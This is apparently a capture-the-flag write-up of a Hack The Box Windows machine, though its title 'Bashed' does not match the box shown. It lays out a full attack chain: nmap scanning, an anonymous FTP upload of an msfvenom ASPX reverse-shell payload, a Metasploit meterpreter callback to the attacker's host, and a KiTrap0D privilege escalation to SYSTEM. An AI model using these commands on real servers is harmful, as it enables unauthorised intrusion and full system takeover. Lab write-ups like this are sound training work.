Bashed
Machine Level: Easy OS: Windows
Scanning
I ran an aggressive nmap scan to find some ports and services running on the machine.
ajread@aj-ubuntu:~/hackthebox$ nmap -A [TARGET IP]
Starting Nmap 7.80 ( https://nmap.org ) at 2023-02-08 18:08 EST
Nmap scan report for [TARGET IP]
Host is up (0.013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.80 secondsEnumeration
I was able to log into the machine with an anonymous ftp logon.
ajread@aj-ubuntu:~/hackthebox$ ftp [TARGET IP]
Connected to [TARGET IP].
220 Microsoft FTP Service
Name ([TARGET IP]:ajread): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49158|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> It looked as if the ftp server contained the image and htm from the page on port 80. I looked around on the ftp server and I appeared to find the version.
ftp> dir
229 Entering Extended Passive Mode (|||49160|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> system_web
226 Transfer complete.
ftp> cd system_web
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49161|)
150 Opening ASCII mode data connection.
03-18-17 01:06AM <DIR> 2_0_50727
226 Transfer complete.
ftp> cd 2_0_50727
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||49163|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> Initial Access
I created a shell in ASPX using msfvenom using this.
ajread@aj-ubuntu:~/hackthebox/playground$ sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=[LOCAL IP]LPORT=4444 -f aspx > shell.aspx
[sudo] password for ajread:
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of aspx file: 2848 bytesI put the shell on the server using the anonymous ftp logon.
ftp> ls
229 Entering Extended Passive Mode (|||49164|)
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
229 Entering Extended Passive Mode (|||49165|)
125 Data connection already open; Transfer starting.
100% |*************************************| 2888 9.56 MiB/s --:-- ETA
226 Transfer complete.
2888 bytes sent in 00:00 (156.60 KiB/s)
ftp> I started an exploit/multi/handler with the correct LPORT and LHOST on metasploit and navigated to http://[TARGET IP]/shell.aspx. I was dropped into a meterpreter session on my local machine.
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on [LOCAL IP]:4444
[*] Sending stage (175686 bytes) to [TARGET IP]
[*] Meterpreter session 1 opened ([LOCAL IP]:4444 -> [LOCAL IP]:49166) at 2023-02-08 18:27:14 -0500
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > I noticed that I was an unprivileged user, so I backgrounded the session and ran a local windows exploit suggester in metasploit.
msf6 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf6 post(multi/recon/local_exploit_suggester) > runOne of the exploits stood out to me which creates a new session with SYSTEM privileges via the KiTrap0D exploit, which realies on the kitrap0d.x86.dll.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.I ran the exploit and was dropped into a privileged shell!
msf6 exploit(windows/local/ms10_015_kitrap0d) > run
[*] Started reverse TCP handler on [LOCAL IP]:7777
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 2332 launched.
[*] Reflectively injecting the DLL into 2332...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to [TARGET IP]
[*] Meterpreter session 2 opened ([LOCAL IP]:7777 -> [TARGET IP]:49167) at 2023-02-08 18:39:11 -0500
meterpreter > pwd
c:\Users
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > I was able to read both the user and root flags.
c:\Users\babis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Users\babis\Desktop
11/02/2022 03:54 �� <DIR> .
11/02/2022 03:54 �� <DIR> ..
09/02/2023 01:00 �� 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 4.697.468.928 bytes free
c:\Users\babis\Desktop>c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971
Directory of c:\Users\Administrator\Desktop
14/01/2021 11:42 �� <DIR> .
14/01/2021 11:42 �� <DIR> ..
09/02/2023 01:00 �� 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4.697.468.928 bytes free
Last updated